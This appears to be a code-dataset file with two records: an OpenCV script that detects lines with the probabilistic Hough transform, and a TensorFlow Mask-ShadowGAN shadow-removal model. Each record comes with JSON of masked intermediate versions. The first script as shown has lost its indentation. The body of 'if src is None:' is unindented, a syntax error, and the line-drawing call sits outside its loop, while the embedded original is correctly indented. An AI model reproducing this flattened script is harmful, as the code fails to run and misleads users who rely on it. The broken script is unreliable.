# rho : spacing of rho values in the accumulator array (usually 1.0)
# theta : spacing of theta values in the accumulator array (usually np.pi/180)
# Larger rho/theta values make the accumulator array smaller; smaller values make it larger.
# A large accumulator represents lines more precisely, but costs more computation.
# A small accumulator cannot represent lines as precisely, but with less computation it runs faster.
# threshold : accumulator count needed to accept a line (lower it to detect more lines; raise it to detect fewer).
# lines : returned as a 3-D matrix (numpy.ndarray) holding the rho, theta values.
# Only rho and theta are really needed, but a useless extra dimension was added
# when the C++ API was wrapped for Python.
# lines has shape (N, 1, 2), dtype = numpy.float32  ** mind the shape
# The middle 1 carries no meaning, so just index it with [0] when writing code.
# rho, theta values are hard for us to read directly.
## Probabilistic Hough transform
# cv2.HoughLinesP(image, rho, theta, threshold, lines=None, minLineLength=None, maxLineGap=None)
# image : input edge image (an edge map produced by the Canny operator)
# rho : spacing of rho values in the accumulator array (usually 1.0)
# theta : spacing of theta values in the accumulator array (usually np.pi/180)
# threshold : accumulator count needed to accept a line (lower it to detect more lines; raise it to detect fewer).
# lines : numpy.ndarray holding the start and end coordinates (x1, y1, x2, y2) of each segment
# shape=(N, 1, 4), dtype = numpy.int32
# minLineLength : minimum segment length to detect (shorter segments are not detected)
# maxLineGap : maximum gap between edge points still treated as one line. Default 0.
# With the default 0, edges with a gap like _ _ are not treated as a single line,
# but with a value of 4, even __ _ __ ___ with gaps is treated as one line.
import sys, cv2, numpy as np
# src = cv2.imread('./images/bd.png', cv2.IMREAD_GRAYSCALE)
src = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)
if src is None:
print('Image load failed')
sys.exit()
edges = cv2.Canny(src, 50, 150)
lines = cv2.HoughLinesP(edges, 1, np.pi/180.0, 150, minLineLength=50, maxLineGap=5) # higher threshold -> fewer lines detected, lower -> more
# Convert the edge image to BGR so the line segments can be drawn in color; Canny() output is grayscale.
dst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)
if lines is not None:
    for i in range(lines.shape[0]): # N segments are detected; N is not known in advance
        pt1 = (lines[i][0][0], lines[i][0][1]) # start-point coordinates; the middle index is always 0
        pt2 = (lines[i][0][2], lines[i][0][3]) # end-point coordinates; the middle index is always 0
cv2.line(dst, pt1, pt2, (0,255,0), 2, cv2.LINE_AA)
cv2.imshow('src',src)
cv2.imshow('edges',edges)
cv2.imshow('dst',dst)
cv2.waitKey()
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "ff7cb8261f3abb70599725fe7c598c571d037226",
"index": 9535,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif src is None:\n print('Image load failed')\n sys.exit()\n<mask token>\nif lines is not None:\n for i in range(lines.shape[0]):\n pt1 = lines[i][0][0], lines[i][0][1]\n pt2 = lines[i][0][2], lines[i][0][3]\n cv2.line(dst, pt1, pt2, (0, 255, 0), 2, cv2.LINE_AA)\ncv2.imshow('src', src)\ncv2.imshow('edges', edges)\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nsrc = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)\nif src is None:\n print('Image load failed')\n sys.exit()\nedges = cv2.Canny(src, 50, 150)\nlines = cv2.HoughLinesP(edges, 1, np.pi / 180.0, 150, minLineLength=50,\n maxLineGap=5)\ndst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)\nif lines is not None:\n for i in range(lines.shape[0]):\n pt1 = lines[i][0][0], lines[i][0][1]\n pt2 = lines[i][0][2], lines[i][0][3]\n cv2.line(dst, pt1, pt2, (0, 255, 0), 2, cv2.LINE_AA)\ncv2.imshow('src', src)\ncv2.imshow('edges', edges)\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()\n",
"step-4": "import sys, cv2, numpy as np\nsrc = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)\nif src is None:\n print('Image load failed')\n sys.exit()\nedges = cv2.Canny(src, 50, 150)\nlines = cv2.HoughLinesP(edges, 1, np.pi / 180.0, 150, minLineLength=50,\n maxLineGap=5)\ndst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)\nif lines is not None:\n for i in range(lines.shape[0]):\n pt1 = lines[i][0][0], lines[i][0][1]\n pt2 = lines[i][0][2], lines[i][0][3]\n cv2.line(dst, pt1, pt2, (0, 255, 0), 2, cv2.LINE_AA)\ncv2.imshow('src', src)\ncv2.imshow('edges', edges)\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()\n",
"step-5": "## 허프변환에 의한 직선 검출\r\n# cv2.HoughLines(image, rho, theta, threshold, lines=None, srn=None, stn=None, min-theta=None, max-theta=None) => lines\r\n# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)\r\n# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)\r\n# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)\r\n\r\n# rho, theta 값이 커지면 축적배열의 크기는 작아지고, 값이 작으면 축적배열은 커진다.\r\n# 축적배열이 크면 정교한 직선을 표현할 수 있으나, 연산량이 많아진다.\r\n# 축적배열이 작아면 정밀한 직선을 표현할 수 없으나, 연산량이 적어 속도는 빠르다.\r\n\r\n# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.\r\n\r\n# lines : rho, theta 값을 담고 있는 3차원 행렬(numpy.ndarray) 형태로 리턴된다.\r\n# rho, theta를 행렬로 표현한다고 하면 rho, theta 2개만 있으면 되는데\r\n# c++에서 파이썬으로 넘어오면서 쓸데없는 값이 추가되었다.\r\n# lines 의 shape은 (N, 1, 2), dtype = numpy.float32 **shape 주의할 것\r\n# 가운데 1이 의미없는 값. 그래서 나중에 코드화할 때 [0]을 집어넣으면 된다.\r\n\r\n# rho, theta값은 우리가 알아보기 힘들다.\r\n## 확률적 허프 변환\r\n# cv2.HoughLinesP(image, rho, theta, threshold, lines=None, minLineLength=None, maxLineGap=None)\r\n# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)\r\n# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)\r\n# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)\r\n# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.\r\n\r\n# lines : 선분의 시작과 끝 좌표(x1, y1, x2, y2) 정보를 담고 있는 numpy.ndarray\r\n# shape=(N, 1, 4), dtype = numpy.int32\r\n\r\n# minLineLength : 검출하기 위한 선분의 최소 길이. (최소길이에 못미치면 검출X)\r\n# maxLineGap : 직선으로 간주하기 위한 최대 에지 점 간격. 기본값 0\r\n# 기본값이 0일 때는, _ _ 이렇게 에지에 간격이 있으면 하나의 직선으로 보지 않고,\r\n# 이 값을 4로 줬을 때는, __ _ __ ___ 이렇게 간격이 3개 있어도 하나의 직선으로 본다.\r\n\r\nimport sys, cv2, numpy as np\r\n\r\n# src = cv2.imread('./images/bd.png', cv2.IMREAD_GRAYSCALE)\r\nsrc = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)\r\nif src is None:\r\n print('Image load failed')\r\n sys.exit()\r\n\r\nedges = cv2.Canny(src, 50, 150)\r\n\r\nlines = cv2.HoughLinesP(edges, 1, np.pi/180.0, 150, minLineLength=50, maxLineGap=5) # threshold값 ↑적게검출 ↓많이검출 \r\n\r\n# 색을 칠해서 선분을 표현할 거니까 해당 edge를 BGR로 바꿔줘야함. Canny()하면 grayscale됨.\r\ndst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)\r\n\r\nif lines is not None:\r\n for i in range(lines.shape[0]): # N개 검출됨. N의 값은 알 수 없다.\r\n pt1 = (lines[i][0][0], lines[i][0][1]) # 시작점 좌표, 가운데 값은 무조건 0으로\r\n pt2 = (lines[i][0][2], lines[i][0][3]) # 끝점 좌표, 가운데 값은 무조건 0으로\r\n\r\n cv2.line(dst, pt1, pt2, (0,255,0), 2, cv2.LINE_AA)\r\n\r\n\r\ncv2.imshow('src',src)\r\ncv2.imshow('edges',edges)\r\ncv2.imshow('dst',dst)\r\ncv2.waitKey()\r\n\r\ncv2.destroyAllWindows()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import tensorflow as tf
from models.base_model import BaseModel
from utils.im_utils import batch_convert_2_int
from datasets.single_dataset import SingleDataset
from datasets.unpaired_dataset import UnpairedDataset
from models.generators.maskshadowgan_generators import Generator
from models.discriminators.maskshadowgan_discriminators import Discriminator
class MaskShadowGANModel(BaseModel):
"""
Implementation of Mask-ShadowGAN model for shadow removal of unpaired data.
A: shadow images domain
B: shadow free images domain
Paper: https://arxiv.org/pdf/1903.10683.pdf
"""
def __init__(self, opt, training):
BaseModel.__init__(self, opt, training)
# create placeholders for images and shadow masks
self.realA = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])
self.realB = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])
self.fakeA = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])
self.fakeB = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])
self.rand_mask = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])
self.last_mask = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])
self.mask_non_shadow = tf.constant(-1.0, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])
def generate_dataset(self):
"""
Add ops for dataset loaders to graph
"""
if self.training:
dataset = UnpairedDataset(self.opt, self.training)
datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache', cacheB='./dataB.tfcache')
dataA_iter = datasetA.make_initializable_iterator()
dataB_iter = datasetB.make_initializable_iterator()
return dataA_iter, dataB_iter, dataA_iter.get_next(), dataB_iter.get_next()
else: # only need shadow dataset for testing
dataset = SingleDataset(self.opt, self.training)
datasetA = dataset.generate()
dataA_iter = datasetA.make_initializable_iterator()
return dataA_iter, dataA_iter.get_next()
def build(self):
"""
Build TensorFlow graph for MaskShadowGAN model.
"""
# add ops for generator (A->B) to graph
self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf, norm_type=self.opt.layer_norm_type,
init_type=self.opt.weight_init_type, init_gain=self.opt.weight_init_gain,
training=self.training, name='G')
if self.training:
# add ops for other generator (B->A) and discriminators to graph
self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,
norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,
init_gain=self.opt.weight_init_gain, training=self.training, name='F')
self.D_A = Discriminator(channels=self.opt.channels, ndf=self.opt.ndf,
norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,
init_gain=self.opt.weight_init_gain, training=self.training, name='D_A')
self.D_B = Discriminator(channels=self.opt.channels, ndf=self.opt.ndf,
norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,
init_gain=self.opt.weight_init_gain, training=self.training, name='D_B')
# generate fake images
fakeB = self.G(self.realA)
fakeA = self.F(self.realB, self.rand_mask)
# generate reconstructed images
reconstructedA = self.F(fakeB, self.last_mask)
reconstructedB = self.G(fakeA)
# generate identity mapping images
identA = self.G(self.realB)
identB = self.F(self.realA, self.mask_non_shadow)
tf.summary.image('A/original', batch_convert_2_int(self.realA))
tf.summary.image('B/original', batch_convert_2_int(self.realB))
tf.summary.image('A/generated', batch_convert_2_int(fakeA))
tf.summary.image('B/generated', batch_convert_2_int(fakeB))
tf.summary.image('A/reconstructed', batch_convert_2_int(reconstructedA))
tf.summary.image('B/reconstructed', batch_convert_2_int(reconstructedB))
# add loss ops to graph
Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB, reconstructedA,
reconstructedB, identA, identB)
# add optimizer ops to graph
optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)
return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss
else: # only need generator from A->B during testing
fakeB = self.G(self.realA)
return fakeB
def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA, identB):
"""
Compute the losses for the generators and discriminators.
"""
# compute the generators loss
G_loss = self.__G_loss(self.D_B, fakeB)
F_loss = self.__G_loss(self.D_A, fakeA)
cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)
ident_loss = self.__identity_loss(identA, identB)
Gen_loss = G_loss + F_loss + cc_loss + ident_loss
        # Compute the discriminators loss. Use fake images from the image pool to improve stability
D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)
D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)
return Gen_loss, D_A_loss, D_B_loss
def __D_loss(self, D, real, fake):
"""
Compute the discriminator loss.
(MSE Loss):
L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]
"""
loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) + \
tf.reduce_mean(tf.square(D(fake))))
return loss
def __G_loss(self, D, fake):
"""
Compute the generator loss.
(MSE Loss):
L_gen = Expectation of (D(G(A)) - 1)^2
"""
loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))
return loss
def __cycle_consistency_loss(self, reconstructedA, reconstructedB):
"""
        Compute the cycle consistency loss.
L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +
                lamB * [Expectation of L1_norm(G(F(B)) - B)]
"""
loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.realA)) + \
self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB - self.realB))
return loss
def __identity_loss(self, identA, identB):
"""
Compute the identity loss.
        L_idt = lambda_ident * [lamA * [Expectation of L1_norm(F(A) - A)] +
lamB * [Expectation of L1_norm(G(B) - B)]]
"""
loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.abs(identB - self.realA)) + \
self.opt.lamB * tf.reduce_mean(tf.abs(identA - self.realB)))
return loss
def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):
"""
Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN
https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py
"""
def make_optimizer(loss, variables, name='Adam'):
""" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)
and a linearly decaying rate that goes to zero over the next 100k steps
"""
global_step = tf.Variable(0, trainable=False, name='global_step')
starter_learning_rate = self.opt.lr
end_learning_rate = 0.0
start_decay_step = self.opt.niter
decay_steps = self.opt.niter_decay
beta1 = self.opt.beta1
learning_rate = (tf.where(tf.greater_equal(global_step, start_decay_step),
tf.train.polynomial_decay(starter_learning_rate,
global_step-start_decay_step,
decay_steps, end_learning_rate,
power=1.0),
starter_learning_rate))
learning_step = (tf.train.AdamOptimizer(learning_rate, beta1=beta1, name=name)
.minimize(loss, global_step=global_step, var_list=variables))
return learning_step
Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.variables, name='Adam_Gen')
D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name='Adam_D_A')
D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name='Adam_D_B')
with tf.control_dependencies([Gen_optimizer, D_A_optimizer, D_B_optimizer]):
return tf.no_op(name='optimizers')
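# --- Illustrative usage sketch (not part of the original module) ---
# Assumption: 'opt' is an options namespace exposing the fields referenced above
# (batch_size, crop_size, channels, ngf, ndf, lr, niter, niter_decay, beta1, lamA, lamB, lambda_ident, ...).
#   model = MaskShadowGANModel(opt, training=True)
#   dataA_iter, dataB_iter, nextA, nextB = model.generate_dataset()
#   fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss = model.build()
#   # then, inside a tf.Session loop, run 'optimizers' while feeding
#   # model.realA, model.realB, model.rand_mask, model.last_mask (and fakeA/fakeB from an image pool).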
|
normal
|
{
"blob_id": "cbbe273a19a4e60b760e35aeb8d43972a46760f5",
"index": 3436,
"step-1": "<mask token>\n\n\nclass MaskShadowGANModel(BaseModel):\n <mask token>\n <mask token>\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache',\n cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n return dataA_iter, dataB_iter, dataA_iter.get_next(\n ), dataB_iter.get_next()\n else:\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain, training\n =self.training, name='G')\n if self.training:\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_B')\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n reconstructedA = self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(\n reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(\n reconstructedB))\n Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB,\n reconstructedA, reconstructedB, identA, identB)\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else:\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA,\n identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) +\n tf.reduce_mean(tf.square(D(fake))))\n return 
loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.\n realA)) + self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB -\n self.realB))\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.\n abs(identB - self.realA)) + self.opt.lamB * tf.reduce_mean(tf.\n abs(identA - self.realB)))\n return loss\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MaskShadowGANModel(BaseModel):\n <mask token>\n <mask token>\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache',\n cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n return dataA_iter, dataB_iter, dataA_iter.get_next(\n ), dataB_iter.get_next()\n else:\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain, training\n =self.training, name='G')\n if self.training:\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_B')\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n reconstructedA = self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(\n reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(\n reconstructedB))\n Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB,\n reconstructedA, reconstructedB, identA, identB)\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else:\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA,\n identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) +\n tf.reduce_mean(tf.square(D(fake))))\n return 
loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.\n realA)) + self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB -\n self.realB))\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.\n abs(identB - self.realA)) + self.opt.lamB * tf.reduce_mean(tf.\n abs(identA - self.realB)))\n return loss\n\n def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):\n \"\"\"\n Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN\n https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py\n \"\"\"\n\n def make_optimizer(loss, variables, name='Adam'):\n \"\"\" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)\n and a linearly decaying rate that goes to zero over the next 100k steps\n \"\"\"\n global_step = tf.Variable(0, trainable=False, name='global_step')\n starter_learning_rate = self.opt.lr\n end_learning_rate = 0.0\n start_decay_step = self.opt.niter\n decay_steps = self.opt.niter_decay\n beta1 = self.opt.beta1\n learning_rate = tf.where(tf.greater_equal(global_step,\n start_decay_step), tf.train.polynomial_decay(\n starter_learning_rate, global_step - start_decay_step,\n decay_steps, end_learning_rate, power=1.0),\n starter_learning_rate)\n learning_step = tf.train.AdamOptimizer(learning_rate, beta1=\n beta1, name=name).minimize(loss, global_step=global_step,\n var_list=variables)\n return learning_step\n Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.\n variables, name='Adam_Gen')\n D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name=\n 'Adam_D_A')\n D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name=\n 'Adam_D_B')\n with tf.control_dependencies([Gen_optimizer, D_A_optimizer,\n D_B_optimizer]):\n return tf.no_op(name='optimizers')\n",
"step-3": "<mask token>\n\n\nclass MaskShadowGANModel(BaseModel):\n \"\"\"\n Implementation of Mask-ShadowGAN model for shadow removal of unpaired data.\n\n A: shadow images domain\n B: shadow free images domain\n\n Paper: https://arxiv.org/pdf/1903.10683.pdf\n \"\"\"\n\n def __init__(self, opt, training):\n BaseModel.__init__(self, opt, training)\n self.realA = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.realB = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeA = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeB = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.rand_mask = tf.placeholder(tf.float32, shape=[self.opt.\n batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.last_mask = tf.placeholder(tf.float32, shape=[self.opt.\n batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.mask_non_shadow = tf.constant(-1.0, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, 1])\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache',\n cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n return dataA_iter, dataB_iter, dataA_iter.get_next(\n ), dataB_iter.get_next()\n else:\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain, training\n =self.training, name='G')\n if self.training:\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, 